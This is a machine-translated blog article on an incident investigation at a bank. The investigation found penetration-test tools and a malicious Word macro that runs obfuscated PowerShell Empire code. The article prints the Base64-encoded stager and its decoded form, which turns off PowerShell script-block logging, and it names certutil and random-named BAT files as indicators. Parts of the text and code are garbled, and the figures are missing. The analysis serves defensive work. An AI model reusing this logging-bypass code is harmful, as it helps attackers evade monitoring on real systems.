Shulou(Shulou.com)05/31 Report--

It is believed that many inexperienced people don't know what to do about how to detect the attack traffic in POC in the actual scenario. Therefore, this article summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Go straight to the point.

Recently, we studied a PoC from a large bank customer, and after a few days of research, we found several security threats on the same device, including those common during penetration testing.

For example:

1.Eicar sample

2.CQHashDumpv2 (password Export tool)

3.NetCat installation.

After asking the customer, we learned that some of the incidents were penetration tests conducted under authorized circumstances at that time.

But then we discovered a vulnerability exploitation activity against Firefox, and the entire attack timeline is shown in the following figure:

This picture is enough to help us understand what is going on on the device. Next, we also found the following interesting points:

1. The attack begins with a malicious Word document downloaded through a Firefox browser (most likely from an email) that uses macros to open the PowerShell console and then run Empire code.

The exploit files detected by our client are as follows:

According to VirusTotal's records, the exploit file we detected is something that hasn't been seen before. The exploit code was first uploaded at 2018-10-24 09:17:01 UTC, just two hours before the client device opened the file.

two。 After the threat was detected, only 12 of the 57 engines in VT (AI-based engines) identified the malicious document:

Obfuscated Base64 code is loaded in 3.PowerShell:

The following is the obfuscated code:

-W1-C [System.Text.Encoding]:: ASCII.GetString ([System.Convert]:: FromBase64String ('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXYyb3JBY3Rpb24gU2lsZW50bDb250aW51ZQefficiency') | iex; [System.Text.Encoding]: ASCII.GetString ([System.Convert]: FromBase64String ('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJ)

Next, we recovered the Base64 code, which is divided into two phases:

Semi-confusing code

If (${P`S`Vers`IoNTAble}. PSVersioN.MaJOr-ge3) {${g`Pf} = [REf] .ASSeMbly.GETTYPE (('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils')). "GeTFIe`Ld" ((' cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'), 'net + (' onPu'+'blic,'+'Stat'+'ic') If (${g`pF}) {${G`Pc} = ${G`pf} .GetVALUe (${Nu`Ll}) If (${g`pc} [('lo'+'ckLo'+'ggi'+'ng')]) {${G`PC} [(' Script'+'B') + ('lo'+'ckL'+'ogg'+'ing')]] [(' Ena'+'b'+'le'+'Sc'+'riptB') + ('lo'+'ckL'+'ogg'+'ing')] = 0 ${g`PC} [('Scri'+'p'+'tB') + (' lock'+'Loggi'+'n'+'g')] [('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')] = 0} ${V`Al} = [ColleCtioNs.GeNeR

To confuse the code

If (${PSVersIoNTAble}. PSVersioN.MaJOr-ge3) {${gPf} = [REf] .ASSeMbly.GETTYPE (('System.Management.Automation.Utils')). "GeTFIeLd" ((' cachedGroupPolicySettings'), 'Null + (' onPublic,Static')); If (${gpF}) {${GPc} = ${Gpf} .GetVALUE (${NuLl}) If (${gpc} [('ScriptB') + (' lockLogging')]) {${GPC} [('ScriptB') + (' lockLogging')] [('EnableScriptB') + (' lockLogging')] = 0 gPC} [('ScriptB') + (' lockLogging')] [('EnableScriptBlockInvocationLogging')] = 0} ${V`Al} = [ColleCtioNs.GeNeR

It turns out that this is a very popular Empire code, GitHub has: [portal].

The 4.certutil process loaded a suspicious file: emp.txt hvKqcJJPFnm7.txt

As you can see, the file name of this file is very strange. As a txt file, there is also a .txt in the file name, so it successfully caught our attention.

5. We also suspect that cmd loaded a BAT file:

The file name involved in the code is a long random name, and the file address is the\ AppData\ Roaming\ directory.

After reading the above, have you mastered how to detect the attack traffic in POC in the actual scenario? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.